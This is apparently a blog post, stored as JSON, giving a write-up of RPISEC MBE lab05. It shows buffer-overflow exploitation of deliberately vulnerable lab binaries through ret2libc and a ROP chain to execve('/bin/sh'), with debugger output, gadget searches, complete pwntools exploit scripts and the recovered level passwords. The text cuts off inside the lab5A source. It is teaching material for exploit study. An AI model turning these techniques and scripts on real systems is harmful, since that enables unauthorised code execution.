{"id":366,"date":"2018-02-09T09:52:55","date_gmt":"2018-02-09T09:52:55","guid":{"rendered":"https:\/\/devel0pment.de\/?p=366"},"modified":"2019-04-22T09:02:27","modified_gmt":"2019-04-22T09:02:27","slug":"rpisec-mbe-writeup-lab05-dep-and-rop","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=366","title":{"rendered":"RPISEC\/MBE: writeup lab05 (DEP and ROP)"},"content":{"rendered":"

In the last writeup<\/a> we used different format string vulnerabilites in order to exploit the provided binaries. This writeup continues with lab05 which introduces DEP and ROP<\/i>.<\/p>\r\n

As usual there are three levels ranging from C to A:
\r\n–> lab5C<\/a>
\r\n–> lab5B<\/a>
\r\n–> lab5A<\/a><\/p>\r\n

<\/p>\r\n

\r\n

lab5C<\/h1>\r\n

We start by connecting to the first level of lab05 using the credentials lab5C<\/span> with the password lab05start<\/span>:<\/p>\r\n\r\n

\r\ngameadmin@warzone:~$ sudo ssh lab5C@localhost\r\n[sudo] password for gameadmin:\r\nlab5C@localhost's password: (lab05start)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\n\r\nLast login: Mon Jan 22 05:48:49 2018 from localhost\r\n\r\n<\/pre><\/div>\r\n\r\n
Let’s have a look at the source code:\r\n<\/p>\r\n\r\n
\r\nlab5C@warzone:\/levels\/lab05$ cat lab5C.c\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\/* gcc -fno-stack-protector -o lab5C lab5C.c *\/\r\n\r\nchar global_str[128];\r\n\r\n\/* reads a string, copies it to a global *\/\r\nvoid copytoglobal()\r\n{\r\n    char buffer[128] = {0};\r\n    gets(buffer);\r\n    memcpy(global_str, buffer, 128);\r\n}\r\n\r\nint main()\r\n{\r\n    char buffer[128] = {0};\r\n\r\n    printf("I included libc for you...\\n"\\\r\n           "Can you ROP to system()?\\n");\r\n\r\n    copytoglobal();\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n\r\n<\/pre><\/div>\r\n\r\n
What does the program do?
\r\n–> In the main<\/code> function printf<\/code> is called (line 20-21).
\r\n–> The function copytoglobal<\/code> defines a local char array sized 128 bytes (buffer<\/code>, line 11).
\r\n–> This buffer is passed as an argument to a call to gets<\/code> (line 12).<\/p>\r\n
Where is the vulnerability within the program?<\/p>\r\n
This is quite obvious: the function gets<\/code> reads from stdin<\/code> into buffer<\/code> until a newline<\/code> character is read or the end-of-file<\/code> is reached. There is no boundary checking and we can thus exploit this vulnerability to overwrite all values following the buffer on the stack.<\/p>\r\n
The 4th line of the source code already contains the gcc<\/code> command which has been used to compile the binary. The option -fno-stack-protector<\/code> tells gdb<\/code> not to embed a stack canary.<\/p>\r\n
We can also use checksec<\/code> to list all employed security mechanisms:\r\n<\/p>\r\n\r\n
\r\nlab5C@warzone:\/levels\/lab05$ checksec lab5C\r\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY FORTIFIED FORTIFY-able  FILE\r\nPartial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No      0               2       lab5C\r\n\r\n<\/pre><\/div>\r\n\r\n
The difference to the last labs is that NX (No-Execute)<\/i> or also called Data Executive Protection (DEP)<\/i> is enabled now. This means that memory regions like that stack are marked as non-executable. If we try to execute an instructions stored on the stack the program will raise a segmentation fault. Thus we cannot simply store a shellcode in the buffer and overwrite the return address with the address of the buffer.<\/p>\r\n
The instructions of the binary itself, which are stored in the .text<\/code> section, cannot be marked as non-executable since these instructions are supposed to be executed. We can leverage this fact using a technique called Return Oriented Programming (ROP)<\/i>. The idea of ROP<\/i> is to recycle instructions which are already present within the binary itself or within shared libraries used by the binary.<\/p>\r\n
The expression Return Oriented Programming<\/i> is based on the fact that single instructions, which are followed by a ret<\/code> instruction, are used. These little code snippets are called ROP-gadgets<\/i>. In order to carry out more complex tasks, multiple ROP-gadgets<\/i> can be chained together forming a so called ROP-chain<\/i>.<\/p>\r\n
If we would like to execute the following instructions:\r\n<\/p>\r\n\r\n
\r\nxor eax, eax\r\npop eax\r\npop edx\r\n\r\n<\/pre><\/div>\r\n\r\n
We would search for these gadgets within the available code:\r\n<\/p>\r\n\r\n
\r\n0x00402a36: xor eax, eax\r\n0x00402a38: ret\r\n\r\n0x00403b46: pop eax\r\n0x00403b47: ret\r\n\r\n0x004087d2: pop edx\r\n0x004087d3: ret\r\n\r\n<\/pre><\/div>\r\n\r\n
In order to execute these gadgets we place the following addresses on the stack (the first one overwriting the initial return address):\r\n<\/p>\r\n
[  0x00402a36  ]    <-- overwritten return address (1st gadget)\r\n[  0x00403b46  ]    <-- 2nd gadget\r\n[  0x004087d2  ]    <-- 3rd gadget\r\n<\/pre>\r\n
When the ret<\/code> instruction of the function with the buffer overflow vulnerability is reached it pops the first address from the stack (0x00402a36<\/code>) and proceeds the code execution at this address: xor eax, eax<\/code>. After that a ret<\/code> instruction follows, letting the code executing proceed at the next gadget and so forth. This way we can build together multiple gadgets<\/i> to a whole ROP-chain<\/i>.<\/p>\r\n
A special use case of ROP<\/i> is a technique called return to libc<\/i> (ret2libc<\/i>). Since most applications use the standard c-library libc<\/i> we can use ROP<\/i> to return to functions within the libc<\/i>. One function we may want to call is system<\/code>.<\/p>\r\n
As we have already seen in the last labs, function arguments are passed on the stack (on a 64bit system function arguments are passed within registers). Thus the stack for this level has to look like this in order to call system(\"bin\/sh\")<\/code>:\r\n<\/p>\r\n
[    address system   ]    <-- overwritten return address\r\n[        JUNK         ]    <-- 4 bytes junk, this is where the code execution proceeds after system<\/code> [ address \"\/bin\/sh\" ] <-- first and only argument to system<\/code><\/pre>\r\n
At first we calculate the offset to the return address using a pattern:\r\n<\/p>\r\n\r\n
\r\ngdb-peda$ pattern create 200 \/tmp\/pat200\r\nWriting pattern of 200 chars to filename "\/tmp\/pat200"\r\ngdb-peda$ r < \/tmp\/pat200\r\nStarting program: \/levels\/lab05\/lab5C < \/tmp\/pat200\r\nI included libc for you...\r\nCan you ROP to system()?\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x20 (' ')\r\nEBX: 0x41416d41 ('AmAA')\r\nECX: 0x0\r\nEDX: 0x804a060 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA")\r\nESI: 0x6e414152 ('RAAn')\r\nEDI: 0x41534141 ('AASA')\r\nEBP: 0x41416f41 ('AoAA')\r\nESP: 0xbffff680 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\nEIP: 0x70414154 ('TAAp')\r\nEFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\nInvalid $PC address: 0x70414154\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff680 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0004| 0xbffff684 ("AqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0008| 0xbffff688 ("VAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0012| 0xbffff68c ("AAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0016| 0xbffff690 ("AsAAXAAtAAYAAuAAZAAvAAwA")\r\n0020| 0xbffff694 ("XAAtAAYAAuAAZAAvAAwA")\r\n0024| 0xbffff698 ("AAYAAuAAZAAvAAwA")\r\n0028| 0xbffff69c ("AuAAZAAvAAwA")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x70414154 in ?? ()\r\ngdb-peda$ pattern offset $eip\r\n1883324756 found at offset: 156\r\ngdb-peda$\r\n\r\n<\/pre><\/div>\r\n\r\n
The program raised a segmentation fault when trying to access the address 0x70414154<\/code> which is part of the pattern gdb-peda<\/code> created for us. The offset can be calculated automatically using the command pattern offset $eip<\/code>: 156<\/code>.<\/p>\r\n
Now we have to get the address of the function system<\/code> as well as the string \"\/bin\/sh\"<\/code>. Luckily the libc contains this string:\r\n<\/p>\r\n\r\n
\r\ngdb-peda$ p system\r\n$1 = {<text variable, no debug info>} 0xb7e63190 <__libc_system>;\r\ngdb-peda$ searchmem "\/bin\/sh"\r\nSearching for '\/bin\/sh' in: None ranges\r\nFound 1 results, display max 1 items:\r\nlibc : 0xb7f83a24 ("\/bin\/sh")\r\n\r\n<\/pre><\/div>\r\n\r\n
The only thing left do is to construct the final input:\r\n<\/p>\r\n
[  ... 156 bytes ... ]    <-- fill buffer until return address\r\n[     0xb7e63190     ]    <-- address of system<\/code> (overwritten return address) [ JUNK ] <-- 4 bytes junk [ 0xb7f83a24 ] <-- address of \"\/bin\/sh\" (first and only argument to system<\/code>)<\/pre>\r\n
And write a little python script to run the program with this input:\r\n<\/p>\r\n\r\n
\r\nlab5C@warzone:\/levels\/lab05$ cat \/tmp\/exploit_lab5C.py\r\nfrom pwn import *\r\n\r\naddr_system = 0xb7e63190\r\naddr_binsh  = 0xb7f83a24\r\n\r\np = process('.\/lab5C')\r\n\r\nprint(p.recv(100))\r\n\r\nexpl  = 'X' * 156\r\nexpl += p32(addr_system)\r\nexpl += \"JUNK\"\r\nexpl += p32(addr_binsh)\r\n\r\np.sendline(expl)\r\np.interactive()\r\n\r\n<\/pre><\/div>\r\n\r\n
Running the script:\r\n<\/p>\r\n\r\n
\r\nlab5C@warzone:\/levels\/lab05$ python \/tmp\/exploit_lab5C.py\r\n[+] Starting program '.\/lab5C': Done\r\nI included libc for you...\r\nCan you ROP to system()?\r\n\r\n[*] Switching to interactive mode\r\n$ whoami\r\nlab5B\r\n$ cat \/home\/lab5B\/.pass\r\ns0m3tim3s_r3t2libC_1s_3n0ugh\r\n\r\n<\/pre><\/div>\r\n\r\n
<\/p>\r\n
Done \ud83d\ude42 The password for the next level is s0m3tim3s_r3t2libC_1s_3n0ugh<\/code>.<\/p>\r\n
\r\n
lab5B<\/h1>\r\n
We connecting to the next level using the previously gained credentials lab5B<\/span> with the password s0m3tim3s_r3t2libC_1s_3n0ugh<\/span>:\r\n<\/p>\r\n\r\n
\r\ngameadmin@warzone:~$ sudo ssh lab5B@localhost\r\nlab5B@localhost's password: (s0m3tim3s_r3t2libC_1s_3n0ugh)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\nLast login: Mon Jan 22 16:04:02 2018 from localhost\r\n\r\n<\/pre><\/div>\r\n\r\n
Let’s have a look at the source code:\r\n<\/p>\r\n\r\n
\r\nlab5B@warzone:\/levels\/lab05$ cat lab5B.c\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\/* gcc -fno-stack-protector --static -o lab5B lab5B.c *\/\r\n\r\nint main()\r\n{\r\n\r\n    char buffer[128] = {0};\r\n\r\n    printf("Insert ROP chain here:\\n");\r\n    gets(buffer);\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n\r\n<\/pre><\/div>\r\n\r\n
The source code is even smaller than the source code from the last level. There is just simple buffer overflow vulnerability, because gets<\/code> reads into buffer<\/code> without any boundary checking.<\/p>\r\n
More interesting are the gcc<\/code> options used to compile the binary on line 4. We can use the buffer overflow to override the return address of the function main<\/code> since there is no stack canary (option -fno-stack-protector<\/code>). The second option set is --static<\/code>, which creates a statically linked binary. In comparison to a dynamically linked binary all required libraries are included in the binary itself. This means that the binary does not need to load any libraries such as the libc. All necessary functions are already included. We can verify that these compiler options have been used with checksec<\/code>, file<\/code> and radare2<\/code>:\r\n<\/p>\r\n\r\n
\r\nlab5B@warzone:\/levels\/lab05$ checksec lab5B\r\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY FORTIFIED FORTIFY-able  FILE\r\nPartial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   Yes     2               40      lab5B\r\n\r\n<\/pre><\/div>\r\n\r\n
checksec<\/code> tells us that no canary has been found (-fno-stack-protector<\/code>) and NX<\/code> is enabled. This is the default value for NX<\/code> and has been disabled in the previous labs using the option -z execstack<\/code>.<\/p>\r\n
The type of linkage can be verified using file<\/code>:\r\n<\/p>\r\n\r\n
\r\nlab5B@warzone:\/levels\/lab05$ file lab5B\r\nlab5B: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (GNU\/Linux), statically linked, for GNU\/Linux 2.6.24, BuildID[sha1]=09ad107d6eb5518c5781ccffdad51b39a28e237e, not stripped\r\n\r\n<\/pre><\/div>\r\n\r\n
The binary is linked statically.<\/p>\r\n
Alternatively we can also use radare2<\/code> to get all this information:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> iI\r\npic      false\r\ncanary   false\r\nnx       true\r\ncrypto   false\r\nva       true\r\nbintype  elf\r\nclass    ELF32\r\nlang     c\r\narch     x86\r\nbits     32\r\nmachine  Intel 80386\r\nos       linux\r\nsubsys   linux\r\nendian   little\r\nstripped false\r\nstatic   true\r\nlinenum  true\r\nlsyms    true\r\nrelocs   true\r\nrpath    NONE\r\nbinsz    737496\r\n\r\n<\/pre><\/div>\r\n\r\n
The difference to the last level, where we could just return to libc<\/i>, is that there is no libc here since all required functions are statically linked into the binary. Thus we have to use the available code snippets (gadgets<\/i>) and create a ROP-chain<\/i>.<\/p>\r\n
As usual the first thing we need to do is to determine the offset to the return address we want to overwrite:\r\n<\/p>\r\n\r\n
\r\ngdb-peda$ pattern create 200 \/tmp\/pattern_lab5B\r\nWriting pattern of 200 chars to filename "\/tmp\/pattern_lab5B"\r\ngdb-peda$ r < \/tmp\/pattern_lab5B\r\nStarting program: \/levels\/lab05\/lab5B < \/tmp\/pattern_lab5B\r\nInsert ROP chain here:\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x0\r\nEBX: 0x41416b41 ('AkAA')\r\nECX: 0xfbad2098\r\nEDX: 0x80ec4e0 --> 0x0\r\nESI: 0x0\r\nEDI: 0x6c414150 ('PAAl')\r\nEBP: 0x41514141 ('AAQA')\r\nESP: 0xbffff730 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\nEIP: 0x41416d41 ('AmAA')\r\nEFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\nInvalid $PC address: 0x41416d41\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff730 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0004| 0xbffff734 ("AASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0008| 0xbffff738 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0012| 0xbffff73c ("TAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0016| 0xbffff740 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0020| 0xbffff744 ("AqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0024| 0xbffff748 ("VAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n0028| 0xbffff74c ("AAWAAsAAXAAtAAYAAuAAZAAvAAwA")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x41416d41 in ?? ()\r\ngdb-peda$ pattern offset $eip\r\n1094806849 found at offset: 140\r\n\r\n<\/pre><\/div>\r\n\r\n
Using the gdb-peda<\/code> command pattern create<\/code> we can easily create a pattern and run the program with that pattern. The offset to the return address can be calculated after the segmentation fault using the command pattern offset $eip<\/code>: 140 byte.<\/p>\r\n
The ROP-chain<\/i> we are going to create should basically do the same as the shellcode we used in the previous labs: execute the syscall sys_execve<\/code> passing \"\/bin\/sh\"<\/code> as argument and thus spawning a shell.<\/p>\r\n
So we are looking for the following instructions:\r\n<\/p>\r\n\r\n
\r\nmov eax, 0x0b\r\nmov ecx, 0x00\r\nmov edx, 0x00\r\nmov ebx, <address of "\/bin\/sh">\r\nint 0x80\r\n\r\n<\/pre><\/div>\r\n\r\n
We start with the address of \"\/bin\/sh\"<\/code>. In the last level we have seen, that the libc usually contains this string. Unfortunately there is no libc here and the string is not part of the binary:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> \/ \/bin\/sh\r\nSearching 7 bytes from 0x08048000 to 0x080edf44: 2f 62 69 6e 2f 73 68\r\n# 6 [0x8048000-0x80edf44]\r\nhits: 0\r\n\r\n<\/pre><\/div>\r\n\r\n
Nevertheless we can just store the string in the buffer ourself. Thus we only need the address of the buffer. We can determine the address using gdb<\/code> and setting a breakpoint before the call to gets<\/code>:\r\n<\/p>\r\n\r\n
\r\ngdb-peda$ disassemble main\r\nDump of assembler code for function main:\r\n   0x08048e44 <+0>:     push   ebp\r\n   ...\r\n   0x08048e76 <+50>:    mov    DWORD PTR [esp],eax\r\n   0x08048e79 <+53>:    call   0x804f6a0 <gets>\r\n   ...\r\n   0x08048e89 <+69>:    ret\r\nEnd of assembler dump.\r\ngdb-peda$ b *main+53\r\nBreakpoint 1 at 0x8048e79\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab05\/lab5B\r\nInsert ROP chain here:\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff6a0 --> 0x0\r\nEBX: 0xbffff6a0 --> 0x0\r\nECX: 0x80ec4d4 --> 0x0\r\nEDX: 0x17\r\nESI: 0x0\r\nEDI: 0xbffff720 --> 0x80481a8 (<_init>: push   ebx)\r\nEBP: 0xbffff728 --> 0x8049610 (<__libc_csu_fini>:       push   ebx)\r\nESP: 0xbffff690 --> 0xbffff6a0 --> 0x0\r\nEIP: 0x8048e79 (<main+53>:      call   0x804f6a0 <gets>)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048e6d <main+41>: call   0x804f830 <puts>\r\n   0x8048e72 <main+46>: lea    eax,[esp+0x10]\r\n   0x8048e76 <main+50>: mov    DWORD PTR [esp],eax\r\n=> 0x8048e79 <main+53>: call   0x804f6a0 <gets>\r\n   0x8048e7e <main+58>: mov    eax,0x0\r\n   0x8048e83 <main+63>: lea    esp,[ebp-0x8]\r\n   0x8048e86 <main+66>: pop    ebx\r\n   0x8048e87 <main+67>: pop    edi\r\nGuessed arguments:\r\narg[0]: 0xbffff6a0 --> 0x0\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff690 --> 0xbffff6a0 --> 0x0\r\n0004| 0xbffff694 --> 0x0\r\n0008| 0xbffff698 --> 0xca0000\r\n0012| 0xbffff69c --> 0x1\r\n0016| 0xbffff6a0 --> 0x0\r\n0020| 0xbffff6a4 --> 0x0\r\n0024| 0xbffff6a8 --> 0x0\r\n0028| 0xbffff6ac --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048e79 in main ()\r\n\r\n<\/pre><\/div>\r\n\r\n
The argument on the stack is the address to the buffer: 0xbffff6a0<\/code>.<\/p>\r\n
Now we need to find gadgets which will carry out the instructions we want to execute. As always with x86-assembly there are plenty of ways to do things. The instructions we want to execute are basically mov<\/code> instructions. Because it is not very likely that the binary contains the gadget mov ebx, 0xbffff6a0<\/code>, it is more common to look for pop<\/code> instructions. As we control what is on the stack, we can just place the value we want to be in ebx<\/code> on the stack and than execute the gadget pop ebx<\/code>.<\/p>\r\n
So we start by looking for pop<\/code> gadgets. With radare2<\/code> gadgets can be found using the command \/R\/<\/code> (the command should be put into double quotes):\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ pop eax;ret"\r\n  0x0804a0cf             58  pop eax\r\n  0x0804a0d0           08f6  or dh, dh\r\n  0x0804a0d2         c2df0f  ret 0xfdf\r\n\r\n  0x0804be75   69f2ffff0fb6  imul esi, edx, 0xb60fffff\r\n  0x0804be7b             58  pop eax\r\n  0x0804be7c   0880fb380f84  or byte [eax - 0x7bf0c705], al\r\n  0x0804be82             cf  iretd\r\n  ...\r\n\r\n  0x080e4c56             58  pop eax\r\n  0x080e4c57             c3  ret\r\n  ...\r\n\r\n<\/pre><\/div>\r\n\r\n
At 0x080e4c56<\/code> there is the gadget we are looking for to place a value in eax<\/code>.<\/p>\r\n
We proceed with ecx<\/code>, edx<\/code> and ebx<\/code>:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ pop ecx;ret"\r\n  ...\r\n  0x080e55ad             59  pop ecx\r\n  0x080e55ae             c3  ret\r\n  ...\r\n\r\n<\/pre><\/div>\r\n\r\n
Our second gadget to set the value of ecx<\/code> is located at 0x080e55ad<\/code>.\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ pop edx;ret"\r\n  ...\r\n  0x080817f6             5a  pop edx\r\n  0x080817f7             c3  ret\r\n  ...\r\n\r\n<\/pre><\/div>\r\n\r\n
The third gadget is located at 0x080817f6<\/code>.\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ pop ebx;ret"\r\n  ...\r\n  0x080bdeca           c418  les ebx, [eax]\r\n  0x080bdecc             5b  pop ebx\r\n  0x080bdecd             c3  ret\r\n  ...\r\n\r\n<\/pre><\/div>\r\n\r\n
At the fourth gadget is located at 0x080bdecc<\/code>.<\/p>\r\n
The only instruction missing is the syscall int 0x80<\/code>:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ int 0x80"\r\n  ...\r\n  0x0806f31b           6690  nop\r\n  0x0806f31d           6690  nop\r\n  0x0806f31f             90  nop\r\n  0x0806f320           cd80  int 0x80\r\n  0x0806f322             c3  ret\r\n  ...\r\n\r\n<\/pre><\/div>\r\n\r\n
Our final gadget is located at 0x0806f320<\/code>.<\/p>\r\n
The following picture illustrates our ROP-chain:<\/p>\r\n
\"\"<\/p>\r\n
Now we can create a python-script to run our exploit. I used the very comfortable module pwn<\/code> (pwntools<\/code>) to interact with the program:\r\n<\/p>\r\n\r\n
\r\nlab5B@warzone:\/levels\/lab05$ cat \/tmp\/exploit_lab5B.py\r\nfrom pwn import *\r\nimport sys\r\n\r\np = process(\".\/lab5B\")\r\n\r\n_pop_eax = 0x080e4c56\r\n_pop_ecx = 0x080e55ad\r\n_pop_edx = 0x080817f6\r\n_pop_ebx = 0x080bdecc\r\n_int_80h = 0x0806f320\r\n\r\naddr_binsh = 0xbffff6a0\r\naddr_binsh -= int(sys.argv[1], 16)\r\n\r\nprint(p.recv(100))\r\n\r\nexpl = \"\/bin\/sh\\x00\"\r\nexpl += \"X\" * 132\r\nexpl += p32(_pop_eax)\r\nexpl += p32(0x0b)\r\nexpl += p32(_pop_ecx)\r\nexpl += p32(0x00)\r\nexpl += p32(_pop_edx)\r\nexpl += p32(0x00)\r\nexpl += p32(_pop_ebx)\r\nexpl += p32(addr_binsh)\r\nexpl += p32(_int_80h)\r\n\r\np.sendline(expl)\r\np.interactive()\r\n\r\n<\/pre><\/div>\r\n\r\n
As usual I added an offset which can be set from command line when running the script since the stack addresses determined using gdb<\/code> may vary a little bit:\r\n<\/p>\r\n\r\n
\r\nlab5B@warzone:\/levels\/lab05$ python \/tmp\/exploit_lab5B.py 0x00\r\n[+] Starting program '.\/lab5B': Done\r\nInsert ROP chain here:\r\n\r\n[*] Switching to interactive mode\r\n[*] Got EOF while reading in interactive\r\n$\r\n[*] Program '.\/lab5B' stopped with exit code -11\r\n[*] Got EOF while sending in interactive\r\nlab5B@warzone:\/levels\/lab05$ python \/tmp\/exploit_lab5B.py 0x10\r\n\r\n...\r\n\r\nlab5B@warzone:\/levels\/lab05$ python \/tmp\/exploit_lab5B.py 0x50\r\n[+] Starting program '.\/lab5B': Done\r\nInsert ROP chain here:\r\n\r\n[*] Switching to interactive mode\r\n$ whoami\r\nlab5A\r\n$ cat \/home\/lab5A\/.pass\r\nth4ts_th3_r0p_i_lik3_2_s33\r\n\r\n<\/pre><\/div>\r\n\r\n
Done! With the offset 0x50<\/code> our exploit worked. The password is th4ts_th3_r0p_i_lik3_2_s33<\/code>.<\/p>\r\n
\r\n
lab5A<\/h1>\r\n
We connecting to the next level using the previously gained credentials lab5A<\/span> with the password th4ts_th3_r0p_i_lik3_2_s33<\/span>:\r\n<\/p>\r\n\r\n
\r\ngameadmin@warzone:~$ sudo ssh lab5A@localhost\r\nlab5A@localhost's password: (th4ts_th3_r0p_i_lik3_2_s33)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\nLast login: Mon Jan 22 21:48:01 2018 from localhost\r\n\r\n<\/pre><\/div>\r\n\r\n
As usual we start by analysing the source code:\r\n<\/p>\r\n\r\n
\r\nlab5A@warzone:\/levels\/lab05$ cat lab5A.c\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include "utils.h"\r\n\r\n#define STORAGE_SIZE 100\r\n\r\n\/* gcc --static -o lab5A lab5A.c *\/\r\n\r\n\/* get a number from the user and store it *\/\r\nint store_number(unsigned int * data)\r\n{\r\n    unsigned int input = 0;\r\n    int index = 0;\r\n\r\n    \/* get number to store *\/\r\n    printf(" Number: ");\r\n    input = get_unum();\r\n\r\n    \/* get index to store at *\/\r\n    printf(" Index: ");\r\n    index = (int)get_unum();\r\n\r\n    \/* make sure the slot is not reserved *\/\r\n    if(index % 3 == 0 || index > STORAGE_SIZE || (input >> 24) == 0xb7)\r\n    {\r\n        printf(" *** ERROR! ***\\n");\r\n        printf("   This index is reserved for doom!\\n");\r\n        printf("; *** ERROR! ***\\n");\r\n\r\n        return 1;\r\n    }\r\n\r\n    \/* save the number to data storage *\/\r\n    data[index] = input;\r\n\r\n    return 0;\r\n}\r\n\r\n\/* returns the contents of a specified storage index *\/\r\nint read_number(unsigned int * data)\r\n{\r\n    int index = 0;\r\n\r\n    \/* get index to read from *\/\r\n    printf(" Index: ");\r\n    index = (int)get_unum();\r\n\r\n    printf(" Number at data[%d] is %u\\n", index, data[index]);\r\n\r\n    return 0;\r\n}\r\n\r\nint main(int argc, char * argv[], char * envp[])\r\n{\r\n    int res = 0;\r\n    char cmd[20] = {0};\r\n    unsigned 